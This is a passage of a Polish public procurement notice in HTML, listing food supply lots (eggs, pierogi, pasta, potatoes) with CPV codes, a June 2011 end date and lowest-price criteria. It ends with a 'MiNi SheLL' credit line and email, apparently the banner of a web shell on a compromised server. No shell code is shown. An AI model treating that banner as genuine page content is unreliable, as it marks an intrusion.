17	Pieczarka 	kg.	75
18	Papryka  świeża 	kg	20
19	Kalafior świeży 	Kg 	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> JAJA KURZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja kurze świeże kl. I szt 6500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PRODUKTY MĄCZNE GOTOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pierogi ruskie  domowe	Kg.	300 kg
2	Pierogi z kapustą  i pieczarkami 	kg.	90 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> MAKARONY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Makaron świderki  op. 1 KG szt	140
2	Makaron  spagetti  op. 400G     	szt	300
3	makaron  wstążka cięta  op. 400 g	Szt	70
4	Makaron łazanki  op. 500g 	Szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> ZIEMNIAKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne późne  op. 30 kg  600 KG
Polska Norma PN-75-R-744 530.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com